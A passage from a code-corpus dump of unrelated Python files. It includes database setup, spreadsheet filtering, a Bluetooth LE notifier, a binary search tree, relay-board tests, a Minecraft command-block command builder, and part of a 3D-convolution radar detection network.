__tablename__ = 'memory_thing_link'
memory_id = Column(Integer, ForeignKey('memory.id'), primary_key=True)
thing_id = Column(Integer, ForeignKey('thing.id'), primary_key=True)
# if __name__ == '__main__':
# connection
engine = create_engine(DATABASE, echo = DEBUG)
session_factory = sessionmaker(bind = engine)
session = session_factory()
# initialize database
if not os.path.exists('db.sqlite3'):
Base.metadata.create_all(engine)
| 2.84375 | 3 |
doc/filters.py | CargobaseDev/openpyxl | 6 | 11376 | from openpyxl import Workbook
wb = Workbook()
ws = wb.active
data = [
["Fruit", "Quantity"],
["Kiwi", 3],
["Grape", 15],
["Apple", 3],
["Peach", 3],
["Pomegranate", 3],
["Pear", 3],
["Tangerine", 3],
["Blueberry", 3],
["Mango", 3],
["Watermelon", 3],
["Blackberry", 3],
["Orange", 3],
["Raspberry", 3],
["Banana", 3]
]
for r in data:
ws.append(r)
ws.auto_filter.ref = "A1:B15"
ws.auto_filter.add_filter_column(0, ["Kiwi", "Apple", "Mango"])
ws.auto_filter.add_sort_condition("B2:B15")
wb.save("filtered.xlsx")
| 2.78125 | 3 |
Bleak/two_devices.py | mbdev2/MIS_FindMyProfessor | 0 | 11377 | from bleak import BleakClient
import asyncio
import functools
notify_uuid = "00002a19-0000-1000-8000-00805f9b34fb".format(0x2A19)
def callback(sender, data, mac_address):
#data = bytearray(data)
dataint = int.from_bytes(data, byteorder='little', signed=True)
print(mac_address, dataint)
def run(addresses):
loop = asyncio.get_event_loop()
tasks = asyncio.gather(*(connect_to_device(address) for address in addresses))
loop.run_until_complete(tasks)
async def connect_to_device(address):
print("starting", address, "loop")
async with BleakClient(address, timeout=10.0) as client:
print("connect to", address)
try:
#model_number = await client.read_gatt_char(address)
await client.start_notify(notify_uuid, functools.partial(callback, mac_address=address))
await asyncio.sleep(1000.0)
await client.stop_notify(notify_uuid)
except Exception as e:
print(e)
print("disconnect from", address)
if __name__ == "__main__":
run(
["96E8409A-F2EB-4029-B3DC-615FADE0C838","D31CB0CA-890E-476B-80D9-80ED8A3AA69A"]
)
| 2.453125 | 2 |
binary search tree insertion.py | buhuhaha/python | 0 | 11378 | <filename>binary search tree insertion.py<gh_stars>0
class Node:
left = right = None
def __init__(self, data):
self.data = data
def inorder(root):
if root is None:
return
inorder(root.left)
print(root.data, end=' ')
inorder(root.right)
def insert(root, key):
if root is None:
return Node(key)
if key < root.data:
root.left = insert(root.left, key)
else:
root.right = insert(root.right, key)
return root
def constructBST(keys):
root = None
for key in keys:
root = insert(root, key)
return root
if __name__ == '__main__':
keys = [15, 10, 20, 8, 12, 16, 25]
root = constructBST(keys)
inorder(root) | 3.71875 | 4 |
tests/test_env_helpers.py | Azraeht/py-ndebug | 0 | 11379 | <reponame>Azraeht/py-ndebug
from ndebug import env_helpers
def test_inspect_ops(mocker):
mocker.patch.dict('os.environ', {'DEBUG_COLORS': 'no',
'DEBUG_DEPTH': '10',
'DEBUG_SHOW_HIDDEN': 'enabled',
'DEBUG_SOMETHING': 'null'})
actual = env_helpers.options()
assert actual == {'colors': False, 'depth': 10, 'show_hidden': True, 'something': None}
def test_load_and_save():
actual = env_helpers.load()
assert actual == ''
env_helpers.save('test:data')
actual = env_helpers.load()
assert actual == 'test:data'
| 2.09375 | 2 |
relay_lib_seeed_test_2.py | johnwargo/seeed-studio-relay-v2 | 1 | 11380 | #!/usr/bin/python
'''*****************************************************************************************************************
Seeed Studio Relay Board Library V2
Test Application #2
By <NAME> (https://www.johnwargo.com)
********************************************************************************************************************'''
import sys
import time
from seeed_relay_v1 import Relay
def process_loop():
# turn all of the relays on
relay.all_on()
relay.print_status_all()
# wait a second
time.sleep(1)
# turn all of the relays off
relay.all_off()
relay.print_status_all()
# wait a second
time.sleep(1)
# now cycle each relay every second in an infinite loop
while True:
# test the on/off methods
print('Testing on/off methods')
for i in range(1, 5):
relay.on(i)
relay.print_status_all()
time.sleep(1)
relay.off(i)
relay.print_status_all()
time.sleep(1)
# test the toggle method
print('Testing the toggle methods')
for i in range(1, 5):
relay.toggle_port(i)
relay.print_status_all()
time.sleep(1)
relay.toggle_port(i)
relay.print_status_all()
time.sleep(1)
print('Repeating loop')
# Now see what we're supposed to do next
if __name__ == "__main__":
# Create the relay object
relay = Relay()
try:
process_loop()
except KeyboardInterrupt:
print("\nExiting application")
# turn off all of the relays
relay.all_off()
# exit the application
sys.exit(0)
| 2.859375 | 3 |
quasar/sa_database.py | stevencyrway/quasar | 12 | 11381 | <reponame>stevencyrway/quasar
import os
from sqlalchemy import bindparam, create_engine, exc
from sqlalchemy.dialects.postgresql.json import JSONB
from sqlalchemy.engine.url import URL
from sqlalchemy.sql import text
from .utils import log, logerr
# Setup SQL Alchemy vars.
pg_opts = {
'drivername': os.getenv('PG_DRIVER'),
'username': os.getenv('PG_USER'),
'password': os.getenv('<PASSWORD>'),
'host': os.getenv('PG_HOST'),
'port': os.getenv('PG_PORT'),
'database': os.getenv('PG_DATABASE')
}
pg_ssl = os.getenv('PG_SSL')
class Database:
def __init__(self, options={}):
pg_opts.update(options)
self.connect()
def connect(self):
# Setup SQL Alchemy postgres connection.
try:
engine = create_engine(URL(**pg_opts),
connect_args={'sslmode': pg_ssl})
self.engine = engine
self.conn = engine.connect()
except exc.InterfaceError as e:
log("Couldnt't establsh DB connection!")
log("Error is:")
logerr(e)
def disconnect(self):
self.conn.close()
return self.conn
def query(self, query):
return self.conn.execute(query)
def query_str(self, query, record):
# Run query with string substitution using ':thisvar' SQL Alchemy
# standard based formatting. e.g.
# query = 'INSERT :bar into foo;', record = {bar: 'baz'}
run_query = text(query)
return self.conn.execute(run_query, record)
def query_json(self, query, record, col_name):
# Based on the post https://stackoverflow.com/a/46031085, this
# function forces a JSONB binding to insert JSON record types
# into a table using SQL Alchemy.
# This function is tightly coupled with the log_event function
# in the cio_queue.py code. Hacky solution to get
# https://www.pivotaltracker.com/story/show/172585118 resolved.
run_query = text(query)
return self.conn.execute(
run_query.bindparams(bindparam(col_name, type_=JSONB)), record)
| 2.59375 | 3 |
commands/__init__.py | CorneliaXaos/Command-Block-Assembly | 1 | 11382 | import abc
class CommandBlock:
def __init__(self, command, conditional=True, mode='CHAIN', auto=True,
opposite=False, single_use=True):
self.command = command
self.cond = conditional
self.mode = mode
self.auto = auto
self.opposite = opposite
self.single_use = single_use
def resolve(self, scope):
return self.command.resolve(scope)
class Resolvable(metaclass=abc.ABCMeta):
@abc.abstractmethod
def resolve(self, scope):
pass
class SimpleResolve(Resolvable):
def __init__(self, *args):
self.args = args
def resolve(self, scope):
return ' '.join(map(lambda el: el.resolve(scope) \
if isinstance(el, Resolvable) \
else el, self.args))
class Command(Resolvable):
pass
class EntityRef(Resolvable):
def is_single_entity(self, scope):
raise NotImplementedError()
@property
def ref(self):
return EntityReference(self)
class ObjectiveRef(Resolvable):
def __init__(self, name):
assert type(name) == str
self.objective = name
def resolve(self, scope):
return scope.objective(self.objective)
class NameRef(EntityRef):
def __init__(self, name):
assert type(name) == str
self.name = name
@property
def is_single_entity(self, scope):
return True
def resolve(self, scope):
return self.name
class ScoreRef:
def __init__(self, target, objective):
assert isinstance(target, EntityRef)
assert isinstance(objective, ObjectiveRef)
self.target = target
self.objective = objective
def resolve_pair(self, scope):
return '%s %s' % (self.target.resolve(scope),
self.objective.resolve(scope))
class Var(ScoreRef):
def __init__(self, nameref):
super().__init__(GlobalEntity, ObjectiveRef(nameref))
def make_selector(selector, **kwargs):
output = '@' + selector
if not kwargs:
return output
def str_pairs(items):
output = []
for key, value in items:
if type(value) == dict:
value = '{%s}' % str_pairs(value.items())
output.append('%s=%s' % (key, value))
return ','.join(output)
return '%s[%s]' % (output, str_pairs(kwargs.items()))
class Selector(EntityRef):
def __init__(self, type, args=None):
assert type in 'aespr'
self.type = type
assert args is None or isinstance(args, SelectorArgs)
self.args = args
def resolve_params(self, scope):
if not self.args:
return {}
return self.args.resolve(scope)
def is_single_entity(self, scope):
if self.type in 'spr':
return True
params = self.resolve_params(scope)
return 'limit' in params and params['limit'] == '1'
def resolve(self, scope):
return make_selector(self.type, **self.resolve_params(scope))
class _GlobalEntity(EntityRef):
def is_single_entity(self, scope):
return True
def resolve(self, scope):
return scope.global_entity()
GlobalEntity = _GlobalEntity()
class _PosUtil(EntityRef):
def is_single_entity(self, scope):
return True
def resolve(self, scope):
return scope.pos_util_entity()
PosUtil = _PosUtil()
class NbtPath(Resolvable):
def __init__(self, path):
self.path = path
def subpath(self, childpath):
# TODO path validation
return self.__class__(self.path + childpath)
def resolve(self, scope):
return self.path
def __eq__(self, other):
if type(other) != type(self):
return False
return self.path == other.path
def __repr__(self):
return '%s(%s)' % (self.__class__.__name__, self.path)
class Path(NbtPath):
def resolve(self, scope):
return scope.custom_nbt_path(self.path)
class ArrayPath(Path):
def __init__(self, index=None, key=None):
sub = '[%d]' % index if index is not None else ''
assert key is None or index is not None
sub += '.%s' % key if key else ''
super().__init__('%s%s' % (self.name, sub))
def subpath(self, childpath):
# Don't use our constructor
return Path(self.path).subpath(childpath)
class StackPath(ArrayPath):
name = 'stack'
def StackFrame(index):
class StackFramePath(ArrayPath):
name = 'stack[%d].stack' % (-index - 1)
return StackFramePath
StackFrameHead = StackFrame(0)
class GlobalPath(ArrayPath):
name = 'globals'
class Cmd(Command):
def __init__(self, cmd):
self.command = cmd
def resolve(self, scope):
return self.command
class Execute(Command):
def __init__(self, chain):
self.chain = SimpleResolve(*chain._components)
def resolve(self, scope):
return 'execute %s' % self.chain.resolve(scope)
def ensure_selector(sel_arg):
assert isinstance(sel_arg, EntityRef), sel_arg
return sel_arg
class ExecuteChain:
def __init__(self):
self._components = []
self.can_terminate = False
def add(self, *args):
for arg in args:
if type(arg) in [str, int, float]:
self._components.append(str(arg))
elif isinstance(arg, Resolvable):
self._components.append(arg)
else:
assert False, type(arg)
return self
def run(self, cmd):
self.add('run', cmd)
return Execute(self)
def finish(self):
assert self.can_terminate
return Execute(self)
def as_entity(self, select_arg):
self.can_terminate = False
return self.add('as', ensure_selector(select_arg))
def at(self, select_arg):
self.can_terminate = False
return self.add('at', ensure_selector(select_arg))
def at_pos(self, pos):
self.can_terminate = False
return self.add('positioned', pos)
def at_entity_pos(self, select_arg):
self.can_terminate = False
return self.add('positioned', 'as', ensure_selector(select_arg))
def align(self, axes):
self.can_terminate = False
assert ''.join(axis for axis in axes if axis in 'xyz') == axes
return self.add('align', axes)
def facing(self, pos):
self.can_terminate = False
return self.add('facing', pos)
def facing_entity(self, select_arg, feature):
self.can_terminate = False
assert feature == 'eyes' or feature == 'feet'
return self.add('facing', 'entity', ensure_selector(select_arg), \
feature)
def rotated(self, y, x):
self.can_terminate = False
return self.add('rotated', y, x)
def rotated_as_entity(self, select_arg):
self.can_terminate = False
return self.add('rotated', 'as', ensure_selector(select_arg))
def anchored(self, anchor):
self.can_terminate = False
assert anchor == 'feet' or anchor == 'eyes'
return self.add('anchored', anchor)
def cond(self, cond_type):
self.can_terminate = False
assert cond_type == 'if' or cond_type == 'unless'
return ExecuteChain.Cond(self, cond_type)
class Cond:
def add(self, *args):
self.parent.can_terminate = True
return self.parent.add(*((self.cond_type,) + args))
def __init__(self, parent, cond_type):
self.parent = parent
self.cond_type = cond_type
def entity(self, entityref):
return self.add('entity', ensure_selector(entityref))
def score(self, targetref, operator, sourceref):
assert isinstance(targetref, ScoreRef)
assert isinstance(sourceref, ScoreRef)
assert operator in ['<', '<=', '=', '>=', '>']
return self.add('score', targetref.target, targetref.objective,
operator, sourceref.target, sourceref.objective)
def score_range(self, scoreref, range):
assert isinstance(scoreref, ScoreRef)
assert isinstance(range, ScoreRange)
return self.add('score', scoreref.target, scoreref.objective,
'matches', range)
def block(self, pos, block):
assert isinstance(pos, WorldPos) and pos.block_pos
return self.add('block', pos, block)
def blocks_match(self, begin, end, dest, type):
assert type in ['all', 'masked']
return self.add('blocks', begin, end, dest, type)
def store(self, store_type):
assert store_type in ['result', 'success']
self.can_terminate = False
return ExecuteChain.Store(self, store_type)
class Store:
def add(self, *args):
return self.parent.add(*(('store', self.store_type) + args))
def __init__(self, parent, store_type):
self.parent = parent
self.store_type = store_type
def score(self, scoreref):
assert isinstance(scoreref, ScoreRef)
return self.add('score', scoreref.target, scoreref.objective)
def entity(self, target, path, data_type, scale=1):
return self.add('entity', ensure_selector(target), \
path, data_type, scale)
def bossbar(self, bar, attr):
assert attr in ['value', 'max']
return self.add('bossbar', bar, attr)
class BlockOrEntityRef(Resolvable):
pass
class EntityReference(BlockOrEntityRef):
def __init__(self, target):
assert isinstance(target, EntityRef)
self.target = target
def resolve(self, scope):
assert self.target.is_single_entity(scope)
return 'entity %s' % self.target.resolve(scope)
class WorldPos(Resolvable):
def __init__(self, x, y, z, block_pos=False):
is_anchor = self._check_coord(x, True, not block_pos)
was_anchor = self._check_coord(y, is_anchor, not block_pos)
is_anchor = self._check_coord(z, was_anchor, not block_pos)
if was_anchor:
assert is_anchor
self.x, self.y, self.z = x, y, z
self.block_pos = block_pos
def _check_coord(self, val, allow_anchor, allow_float):
if isinstance(val, AnchorRelCoord):
assert allow_anchor
return True
if type(val) == float:
assert allow_float
return False
if type(val) == int:
return False
if isinstance(val, WorldRelCoord):
return False
assert False, val
@property
def ref(self):
return BlockReference(self)
def resolve(self, scope):
return '%s %s %s' % (self.x, self.y, self.z)
class RelativeCoord:
def __init__(self, val):
self.str = self.marker
if type(val) == int:
if val != 0:
self.str += '%d' % val
elif type(val) == float:
if val != 0.0:
# https://stackoverflow.com/a/2440786
self.str += ('%f' % val).rstrip('0').rstrip('.')
else:
assert False, val
self.val = val
def __str__(self):
return self.str
class WorldRelCoord(RelativeCoord):
marker = '~'
class AnchorRelCoord(RelativeCoord):
marker = '^'
class BlockReference(BlockOrEntityRef):
def __init__(self, pos):
assert isinstance(pos, WorldPos) and pos.block_pos
self.pos = pos
def resolve(self, scope):
return 'block %s' % self.pos.resolve(scope)
class _UtilBlockPos(WorldPos):
def __init__(self, is_zero_tick):
self.block_pos = True
self.is_zero_tick = is_zero_tick
def resolve(self, scope):
if self.is_zero_tick:
return scope.get_zero_tick_block()
return scope.get_util_block()
UtilBlockPos = _UtilBlockPos(False)
ZeroTickBlockPos = _UtilBlockPos(True)
class DataGet(Command):
def __init__(self, target, path, scale=1):
assert isinstance(target, BlockOrEntityRef)
assert isinstance(scale, (int, float))
self.target = target
self.path = path
self.scale = int(scale) if scale == int(scale) else scale
def resolve(self, scope):
return 'data get %s %s %s' % (self.target.resolve(scope),
self.path.resolve(scope), self.scale)
class DataMerge(Command):
def __init__(self, ref, nbt):
assert isinstance(ref, BlockOrEntityRef)
self.ref = ref
self.nbt = nbt
def resolve(self, scope):
return 'data merge %s %s' % (self.ref.resolve(scope),
self.nbt.resolve(scope))
class DataModify(Command):
def __init__(self, ref, path, action, *rest):
assert isinstance(ref, BlockOrEntityRef)
self.ref = ref
self.path = path
self.action = action
self.init(*rest)
def resolve(self, scope):
return 'data modify %s %s %s' % (
self.ref.resolve(scope), self.path.resolve(scope), self.action)
class DataModifyValue(DataModify):
def init(self, val):
self.val = val
def resolve(self, scope):
return '%s value %s' % (super().resolve(scope), self.val.resolve(scope))
class DataModifyFrom(DataModify):
def init(self, ref, path):
assert isinstance(ref, BlockOrEntityRef)
self.fromref = ref
self.frompath = path
def resolve(self, scope):
return '%s from %s %s' % (super().resolve(scope),
self.fromref.resolve(scope), self.frompath.resolve(scope))
class DataModifyStack(DataModifyValue):
def __init__(self, index, key, action, value, path=StackPath):
super().__init__(GlobalEntity.ref, path(index, key), action,
value)
class DataRemove(Command):
def __init__(self, ref, path):
assert isinstance(ref, BlockOrEntityRef)
self.ref = ref
self.path = path
def resolve(self, scope):
return 'data remove %s %s' % (self.ref.resolve(scope),
self.path.resolve(scope))
class Function(Command):
def __init__(self, func_name):
self.name = func_name
def resolve(self, scope):
return 'function %s' % scope.function_name(self.name)
class Tellraw(Command):
def __init__(self, text, target):
assert isinstance(text, TextComponentHolder)
assert isinstance(target, EntityRef)
self.text = text
self.target = target
def resolve(self, scope):
return 'tellraw %s %s' % (self.target.resolve(scope),
self.text.resolve_str(scope))
class TextComponent(Resolvable):
pass
class TextComponentHolder(TextComponent):
def __init__(self, style, children):
self.style = style
self.children = children
def resolve_str(self, scope):
import json
return json.dumps(self.resolve(scope), separators=(',', ':'))
def resolve(self, scope):
text = {}
for key, value in self.style.items():
text[key] = self._resolve_style(key, value, scope)
extra = []
for child in self.children:
if isinstance(child, TextComponentHolder) and not child.style:
for child_child in child.children:
extra.append(child_child.resolve(scope))
else:
extra.append(child.resolve(scope))
if not self.style:
return extra
if extra:
if len(extra) == 1 and type(extra[0]) == dict:
text.update(extra[0])
else:
text['extra'] = extra
return text
def _resolve_style(self, key, value, scope):
if key == 'clickEvent':
assert isinstance(value, TextClickAction)
return value.resolve(scope)
return value
class TextStringComponent(TextComponent):
def __init__(self, stringval):
self.val = stringval
def resolve(self, scope):
return {'text': self.val}
class TextNBTComponent(TextComponent):
def __init__(self, entity, path):
assert isinstance(entity, EntityRef)
assert isinstance(path, Path)
self.entity = entity
self.path = path
def resolve(self, scope):
assert self.entity.is_single_entity(scope)
return {'nbt': self.path.resolve(scope),
'entity': self.entity.resolve(scope)}
class TextScoreComponent(TextComponent):
def __init__(self, ref):
assert isinstance(ref, ScoreRef)
self.ref = ref
def resolve(self, scope):
return {'score':
{'name': self.ref.target.resolve(scope),
'objective': self.ref.objective.resolve(scope)}}
class TextClickAction(Resolvable):
def __init__(self, action, value):
self.action = action
self.value = value
def resolve(self, scope):
if type(self.value) == str:
value = self.value
else:
assert self.action in ['run_command', 'suggest_command'] \
and isinstance(self.value, Command)
value = self.value.resolve(scope)
return {'action': self.action, 'value': value}
class Teleport(Command):
def __init__(self, target, *more):
assert isinstance(target, EntityRef)
self.args = [target]
self.args.extend(more)
def resolve(self, scope):
return 'tp %s' % ' '.join(a.resolve(scope) for a in self.args)
class Clone(Command):
def __init__(self, src0, src1, dest):
self.src0 = src0
self.src1 = src1
self.dest = dest
def resolve(self, scope):
return 'clone %s %s %s' % (self.src0.resolve(scope),
self.src1.resolve(scope),
self.dest.resolve(scope))
class Setblock(Command):
def __init__(self, pos, block):
assert isinstance(pos, WorldPos) and pos.block_pos
self.pos = pos
self.block = block
def resolve(self, scope):
return 'setblock %s %s' % (self.pos.resolve(scope),
self.block.resolve(scope))
class Scoreboard(Command):
allows_negative = False
def __init__(self, varref, value):
assert isinstance(varref, ScoreRef)
assert isinstance(value, int)
assert self.allows_negative or value >= 0
self.var = varref
self.value = value
def resolve(self, scope):
return 'scoreboard players %s %s %d' % (
self.op, self.var.resolve_pair(scope), self.value)
class SetConst(Scoreboard):
op = 'set'
allows_negative = True
class AddConst(Scoreboard):
op = 'add'
class RemConst(Scoreboard):
op = 'remove'
class GetValue(Command):
def __init__(self, scoreref):
assert isinstance(scoreref, ScoreRef)
self.ref = scoreref
def resolve(self, scope):
return 'scoreboard players get %s' % self.ref.resolve_pair(scope)
class Operation(Command):
def __init__(self, left, right):
assert isinstance(left, ScoreRef)
assert isinstance(right, ScoreRef)
self.left = left
self.right = right
def resolve(self, scope):
return 'scoreboard players operation %s %s %s' % (
self.left.resolve_pair(scope), self.op,
self.right.resolve_pair(scope))
class OpAssign(Operation): op = '='
class OpAdd(Operation): op = '+='
class OpSub(Operation): op = '-='
class OpMul(Operation): op = '*='
class OpDiv(Operation): op = '/='
class OpMod(Operation): op = '%='
class OpIfLt(Operation): op = '<'
class OpIfGt(Operation): op = '>'
class OpSwap(Operation): op = '><'
class SelectorArgs(Resolvable):
pass
class SimpleSelectorArgs(SelectorArgs):
def __init__(self, args):
self.args = args
def resolve(self, scope):
return dict(self.args)
class ScoreRange(Resolvable):
def __init__(self, min=None, max=None):
assert min is not None or max is not None
self.min = min
self.max = max
def resolve(self, scope):
range = ''
if self.min is not None:
range = '%d' % self.min
if self.max is not None and self.max != self.min:
range += '..%d' % self.max
elif self.max is None:
range += '..'
return range
class SelRange(SelectorArgs):
def __init__(self, objective, min=None, max=None):
assert isinstance(objective, ObjectiveRef)
self.objective = objective
self.range = ScoreRange(min, max)
def resolve(self, scope):
return {'scores': { self.objective.resolve(scope):
self.range.resolve(scope) }}
class SelEquals(SelRange):
def __init__(self, objective, value):
super().__init__(objective, value, value)
class ComboSelectorArgs(SelectorArgs):
@staticmethod
def new(first, second):
if first is None: return second
if second is None: return first
return ComboSelectorArgs(first, second)
def __init__(self, first, second):
self.first = first
self.second = second
def resolve(self, scope):
sel = {}
sel.update(self.first.resolve(scope))
sel.update(self.second.resolve(scope))
return sel
class SelNbt(SelectorArgs):
def __init__(self, path, value):
self.nbt_spec = {}
if not path:
self.nbt_spec = value
else:
self.build_selector(path, self.nbt_spec, value)
def build_selector(self, path, parent, value):
for i in range(len(path) - 1):
node = path[i]
if node.isdigit():
pos = int(node)
while len(parent) < pos + 1:
parent.append({})
parent = parent[pos]
continue
if node not in parent:
parent[node] = {}
if len(path) > i + 1:
if path[i+1].isdigit():
if not parent[node]:
parent[node] = []
else:
assert type(parent[node]) == list
parent = parent[node]
if path[-1].isdigit():
pos = int(path[-1])
while len(parent) < pos + 1:
parent.append({})
path[-1] = pos
parent[path[-1]] = value
def stringify_nbt(self, node, scope):
# TODO quoted keys
if type(node) == dict:
return '{%s}' % ','.join('%s:%s' % (k, self.stringify_nbt(v, scope))
for k,v in node.items())
if type(node) == list:
return '[%s]' % ','.join(map(lambda n:self.stringify_nbt(n, scope), node))
if isinstance(node, Resolvable):
return node.resolve(scope)
assert False, type(node)
def resolve(self, scope):
return {'nbt': self.stringify_nbt(self.nbt_spec, scope)}
class TeamName(Resolvable):
def __init__(self, name):
self.name = name
def resolve(self, scope):
return scope.team_name(self.name)
class TeamModify(Command):
def __init__(self, team, attr, value):
assert isinstance(team, TeamName)
self.team = team
assert attr in ['color', 'friendlyFire', 'seeFriendlyInvisibles',
'nametagVisibility', 'deathMessageVisibility',
'collisionRule', 'displayName', 'prefix', 'suffix']
self.attr = attr
self.value = value
def resolve(self, scope):
return 'team modify %s %s %s' % (self.team.resolve(scope), self.attr,
self.value)
class JoinTeam(Command):
def __init__(self, team, members):
assert isinstance(team, TeamName)
assert members is None or isinstance(members, EntityRef)
self.team = team
self.members = members
def resolve(self, scope):
members = (' ' + self.members.resolve(scope)) if self.members else ''
return 'team join %s%s' % (self.team.resolve(scope), members)
class Bossbar(Resolvable):
def __init__(self, name):
self.name = name
def resolve(self, scope):
return scope.bossbar(self.name)
class BossbarSet(Command):
def __init__(self, bar, prop, value):
assert isinstance(bar, Bossbar)
self.bar = bar
self.prop = prop
self.value = value
def resolve(self, scope):
value = (' ' + self.value.resolve(scope)) if self.value else ''
return 'bossbar set %s %s%s' % (self.bar.resolve(scope), self.prop,
value)
class Kill(Command):
def __init__(self, target):
assert isinstance(target, EntityRef)
self.target = target
def resolve(self, scope):
return 'kill %s' % self.target.resolve(scope)
class ReplaceItem(Command):
def __init__(self, ref, slot, item, amount=None):
assert isinstance(ref, BlockOrEntityRef)
self.ref = ref
self.slot = slot
self.item = item
self.amount = amount
def resolve(self, scope):
amount = (' %d' % self.amount) if self.amount is not None else ''
return 'replaceitem %s %s %s%s' % (self.ref.resolve(scope), self.slot,
self.item.resolve(scope), amount)
class GiveItem(Command):
def __init__(self, targets, item, count=1):
assert isinstance(targets, EntityRef)
self.targets = targets
self.item = item
self.count = count
def resolve(self, scope):
return 'give %s %s %d' % (self.targets.resolve(scope),
self.item.resolve(scope), self.count)
class ClearItem(Command):
def __init__(self, targets, item, max_count=-1):
assert isinstance(targets, EntityRef)
self.targets = targets
self.item = item
self.max_count = max_count
def resolve(self, scope):
return 'clear %s %s %d' % (self.targets.resolve(scope),
self.item.resolve(scope), self.max_count)
class EffectGive(Command):
def __init__(self, target, effect, seconds=None, amp=None, hide=None):
assert isinstance(target, EntityRef)
self.target = target
self.effect = effect
self.seconds = seconds if seconds is not None else 30
self.amp = amp if amp is not None else 0
self.hide = hide if hide is not None else False
def resolve(self, scope):
return 'effect give %s %s %d %d %s' % (self.target.resolve(scope),
self.effect, self.seconds, self.amp,
'true' if self.hide else 'false')
class Particle(Command):
def __init__(self, name, pos, delta, speed, count, mode, players):
self.name = name
self.pos = pos
self.delta = delta
self.speed = speed
self.count = count
self.mode = mode
self.players = players
def resolve(self, scope):
players = (' ' + self.players.resolve(scope)) if self.players else ''
return 'particle %s %s %s %f %d %s%s' % (self.name,
self.pos.resolve(scope), self.delta.resolve(scope),
self.speed, self.count, self.mode, players)
class Title(Command):
def __init__(self, target, action, *args):
assert isinstance(target, EntityRef)
self.target = target
self.action = action
self.args = args
def resolve(self, scope):
args = (' ' + SimpleResolve(*self.args).resolve(scope)) \
if self.args else ''
return 'title %s %s%s' % (self.target.resolve(scope), self.action, args)
class Summon(Command):
def __init__(self, entity_name, pos, data=None):
assert pos is None or isinstance(pos, WorldPos)
self.name = entity_name
self.pos = pos
self.data = data
def resolve(self, scope):
pos = (' ' + self.pos.resolve(scope)) if self.pos else \
(' ~ ~ ~' if self.data else '')
data = (' ' + self.data.resolve(scope)) if self.data else ''
return 'summon %s%s%s' % (self.name, pos, data)
class Advancement(Command):
def __init__(self, action, target, range, *args):
assert action in ['grant', 'revoke']
assert isinstance(target, EntityRef)
self.action = action
self.target = target
self.range = range
self.args = args
def resolve(self, scope):
args = (' ' + SimpleResolve(*self.args).resolve(scope)) \
if self.args else ''
return 'advancement %s %s %s%s' % (self.action,
self.target.resolve(scope),
self.range, args)
class AdvancementRef(Resolvable):
def __init__(self, name):
self.name = name
def resolve(self, scope):
return scope.advancement_name(self.name)
| 2.9375 | 3 |
top/clearlight/reptile/bilibili/bj_tech_mooc/example_04_360.py | ClearlightY/Python_learn | 1 | 11383 | import requests
keyword = "python"
try:
kv = {'q':keyword}
r = requests.get('http://www.so.com/s', params=kv)
print(r.request.url)
r.raise_for_status()
print(len(r.text))
except:
print('爬取失败') | 2.828125 | 3 |
rodnet/models/backbones/cdc_deep.py | zhengzangw/RODNet | 0 | 11384 | import torch.nn as nn
class RODEncode(nn.Module):
def __init__(self, in_channels=2):
super(RODEncode, self).__init__()
self.conv1a = nn.Conv3d(
in_channels=in_channels,
out_channels=64,
kernel_size=(9, 5, 5),
stride=(1, 1, 1),
padding=(4, 2, 2),
)
self.conv1a_1 = nn.Conv3d(
in_channels=64,
out_channels=64,
kernel_size=(9, 5, 5),
stride=(1, 1, 1),
padding=(4, 2, 2),
)
self.conv1a_2 = nn.Conv3d(
in_channels=64,
out_channels=64,
kernel_size=(9, 5, 5),
stride=(1, 1, 1),
padding=(4, 2, 2),
)
self.conv1b = nn.Conv3d(
in_channels=64,
out_channels=64,
kernel_size=(9, 5, 5),
stride=(2, 2, 2),
padding=(4, 2, 2),
)
self.conv2a = nn.Conv3d(
in_channels=64,
out_channels=128,
kernel_size=(9, 5, 5),
stride=(1, 1, 1),
padding=(4, 2, 2),
)
self.conv2b = nn.Conv3d(
in_channels=128,
out_channels=128,
kernel_size=(9, 5, 5),
stride=(2, 2, 2),
padding=(4, 2, 2),
)
self.conv3a = nn.Conv3d(
in_channels=128,
out_channels=256,
kernel_size=(9, 5, 5),
stride=(1, 1, 1),
padding=(4, 2, 2),
)
self.conv3b = nn.Conv3d(
in_channels=256,
out_channels=256,
kernel_size=(9, 5, 5),
stride=(1, 2, 2),
padding=(4, 2, 2),
)
self.bn1a = nn.BatchNorm3d(num_features=64)
self.bn1a_1 = nn.BatchNorm3d(num_features=64)
self.bn1a_2 = nn.BatchNorm3d(num_features=64)
self.bn1b = nn.BatchNorm3d(num_features=64)
self.bn2a = nn.BatchNorm3d(num_features=128)
self.bn2b = nn.BatchNorm3d(num_features=128)
self.bn3a = nn.BatchNorm3d(num_features=256)
self.bn3b = nn.BatchNorm3d(num_features=256)
self.relu = nn.ReLU()
def forward(self, x):
x = self.relu(
self.bn1a(self.conv1a(x))
) # (B, 2, W, 128, 128) -> (B, 64, W, 128, 128)
# additional
x = self.relu(
self.bn1a_1(self.conv1a_1(x))
) # (B, 64, W, 128, 128) -> (B, 64, W, 128, 128)
x = self.relu(
self.bn1a_2(self.conv1a_2(x))
) # (B, 64, W, 128, 128) -> (B, 64, W, 128, 128)
x = self.relu(
self.bn1b(self.conv1b(x))
) # (B, 64, W, 128, 128) -> (B, 64, W/2, 64, 64)
x = self.relu(
self.bn2a(self.conv2a(x))
) # (B, 64, W/2, 64, 64) -> (B, 128, W/2, 64, 64)
x = self.relu(
self.bn2b(self.conv2b(x))
) # (B, 128, W/2, 64, 64) -> (B, 128, W/4, 32, 32)
x = self.relu(
self.bn3a(self.conv3a(x))
) # (B, 128, W/4, 32, 32) -> (B, 256, W/4, 32, 32)
x = self.relu(
self.bn3b(self.conv3b(x))
) # (B, 256, W/4, 32, 32) -> (B, 256, W/4, 16, 16)
return x
class RODDecode(nn.Module):
def __init__(self, n_class):
super(RODDecode, self).__init__()
self.convt1 = nn.ConvTranspose3d(
in_channels=256,
out_channels=128,
kernel_size=(4, 6, 6),
stride=(2, 2, 2),
padding=(1, 2, 2),
)
self.convt2 = nn.ConvTranspose3d(
in_channels=128,
out_channels=64,
kernel_size=(4, 6, 6),
stride=(2, 2, 2),
padding=(1, 2, 2),
)
self.convt3 = nn.ConvTranspose3d(
in_channels=64,
out_channels=n_class,
kernel_size=(3, 6, 6),
stride=(1, 2, 2),
padding=(1, 2, 2),
)
self.prelu = nn.PReLU()
self.sigmoid = nn.Sigmoid()
# self.upsample = nn.Upsample(size=(rodnet_configs['win_size'], radar_configs['ramap_rsize'],
# radar_configs['ramap_asize']), mode='nearest')
def forward(self, x):
x = self.prelu(self.convt1(x)) # (B, 256, W/4, 16, 16) -> (B, 128, W/2, 32, 32)
